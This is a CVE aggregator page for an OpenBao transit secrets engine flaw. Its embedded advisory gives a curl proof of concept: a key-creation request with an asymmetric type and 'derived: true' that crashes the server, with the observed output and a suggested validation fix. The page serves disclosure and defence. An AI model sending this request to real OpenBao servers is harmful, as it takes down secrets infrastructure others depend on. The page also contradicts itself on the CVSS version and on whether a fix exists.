CVE-2026-55776

MEDIUMPre-NVD 6.56.5
EchelonGraph scoreLOW confidence

This medium-severity CVE scores 6.5 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit-prediction score not yet available (the EPSS model rescores nightly; freshly-published CVEs typically appear within 48 hours). GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m
6.5
EchelonGraph verdictMonitorLow exploitation likelihood right now — keep watching.
  • Lower severity and no public exploit yet
CISA-KEV: Not listedEPSS: CVSS: 6.5Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

OpenBao: Transit secrets engine crashes on key creation with derived: true for asymmetric key types

On OpenBao 2.5.4 and 2.5.2(and likely earlier versions also), an authenticated caller with write access to transit/keys/* can crash the OpenBao server by issuing a single key-creation request that combines an asymmetric type (rsa-*, ecdsa-*, ed25519) with derived: true. The server returns no HTTP response and the process terminates (exit code 2). This is a remote, low-complexity denial-of-service against the OpenBao server.

Mount the transit engine:

curl -sS -X POST -H "X-Vault-Token: root" \ -d '{"type":"transit"}' \ http://127.0.0.1:8200/v1/sys/mounts/transit

Trigger the crash:

curl -sS -w '\nHTTP %{http_code}\n' -X POST \ -H "X-Vault-Token: root" \ -H "Content-Type: application/json" \ -d '{"type":"rsa-2048","derived":true,"exportable":true,"deletion_allowed":false}' \ http://127.0.0.1:8200/v1/transit/keys/some-key-name

You can try with both JSON or HCL It will crash the entire cluster.

Observed: HTTP 000 curl: (52) Empty reply from server

$ docker ps -a --filter name=openbao STATUS: Exited (2)

Root Cause (Hypothesis) Key-derivation paths in the transit engine appear to assume a symmetric key shape (a derivable key context). When derived: true is supplied alongside an asymmetric type, the creation path likely panics on a missing derived-key field or invalid type assertion rather than returning a structured validation error. Maintainers should confirm against the transit policy.go / key-creation path.

Suggested fix: Validate the (type, derived) combination at the top of the create-key handler. Reject with a 400 if derived: true is set on any non-symmetric type (i.e. anything other than aes128-gcm96, aes256-gcm96, chacha20-poly1305, xchacha20-poly1305). Do this before any code path that may panic on missing derived-key state.

CVSS v3
6.5
EG Score
6.5(low)
EPSS
KEV
Not listed

Published

June 19, 2026

Last Modified

June 19, 2026

Vendor Advisories for CVE-2026-55776(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Affected Packages

(1 across 1 ecosystem)
Go(1)
PackageVulnerable rangeFixed inDependents
github.com/openbao/openbao0.0.0-20260617104123-db57c62602b2

Data Freshness Timeline

(refreshed 7× in last 7d / 17× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-07 03:08 UTCEG score recompute
  2. 2026-07-06 01:32 UTCEG score recompute
  3. 2026-07-04 23:57 UTCEG score recompute
  4. 2026-07-03 22:23 UTCEG score recompute
  5. 2026-07-02 20:47 UTCEG score recompute
  6. 2026-07-01 19:09 UTCEG score recompute
  7. 2026-06-30 17:34 UTCEG score recompute
  8. 2026-06-29 15:59 UTCEG score recompute
  9. 2026-06-28 14:23 UTCEG score recompute
  10. 2026-06-27 12:46 UTCEG score recompute
  11. 2026-06-26 11:11 UTCEG score recompute
  12. 2026-06-25 06:29 UTCEG score recompute
  13. 2026-06-24 04:52 UTCEG score recompute
  14. 2026-06-23 03:18 UTCEG score recompute
  15. 2026-06-22 01:39 UTCEG score recompute
  16. 2026-06-21 00:02 UTCEG score recompute
  17. 2026-06-19 22:24 UTCEG score recompute

Frequently asked(4)

What is CVE-2026-55776?
CVE-2026-55776 is a medium vulnerability published on June 19, 2026. OpenBao: Transit secrets engine crashes on key creation with derived: true for asymmetric key types On OpenBao 2.5.4 and 2.5.2(and likely earlier versions also), an authenticated caller with write access to transit/keys/ can crash the OpenBao server by issuing a single key-creation request that…
When was CVE-2026-55776 disclosed?
CVE-2026-55776 was first published in the National Vulnerability Database on June 19, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
What is the CVSS score of CVE-2026-55776?
CVE-2026-55776 has a CVSS v4.0 base score of 6.5 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-55776?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-55776, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-55776

Explore →

Is Your Infrastructure Affected by CVE-2026-55776?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.